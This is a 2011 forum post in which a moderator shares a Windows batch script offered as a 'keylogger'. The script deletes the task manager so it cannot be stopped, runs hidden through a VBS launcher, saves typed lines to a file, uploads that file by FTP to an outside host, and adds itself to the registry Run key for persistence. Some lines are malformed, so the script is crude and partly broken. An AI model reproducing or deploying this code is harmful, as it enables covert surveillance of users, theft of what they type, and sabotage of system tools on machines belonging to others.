goldendragon | Date: Wednesday, 2011-11-30, 1:23 AM | Message # 1 |
Sergeant
Group: Moderators
Messages: 23
Awards: 0
Reputation: 1
Status: Offline
| Quote @echo off del C:\WINDOWS\TASKMAN.exe echo set shell = CreateObject("Wscript.Shell") >> C:\windows\stsyk.vbs echo shell.run "C:\windows\k.bat", 0 >> C:\windows\stsyk.vbs echo @echo off >> C:\windows\k.bat echo color c9 >> C:\windows\k.bat echo :go >> C:\windows\k.bat echo echo .>>c:\keys.txt >> C:\windows\k.bat echo echo : >> C:\windows\k.bat echo set /p keys= >> C:\windows\k.bat echo echo %keys%>>c:\keys.txt >> C:\windows\k.bat echo @echo off >> C:\windows\k.bat echo ftp >> C:\windows\k.bat echo open blabla.hoster.com >> C:\windows\k.bat echo username >> C:\windows\k.bat echo password >> C:\windows\k.bat echo put c:\keys.txt >> C:\windows\k.bat echo quit >> C:\windows\k.bat echo goto go >> C:\windows\k.bat echo start C:\windows\stsyk.vbs >> C:\windows\k.bat echo reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "stsyk.vbs" /d "C:\WINDOWS\" start C:\windows\stsyk.vbs
deletes the taskmanager (you cant abbord the keylogger) Thats the first Batch keylogger it writes himself to the registry and saves hidden (with the shell code) all keystrokes whose ends with a "return" into your ftp
Message edited by goldendragon - Wednesday, 2011-11-30, 1:29 AM |
|
| |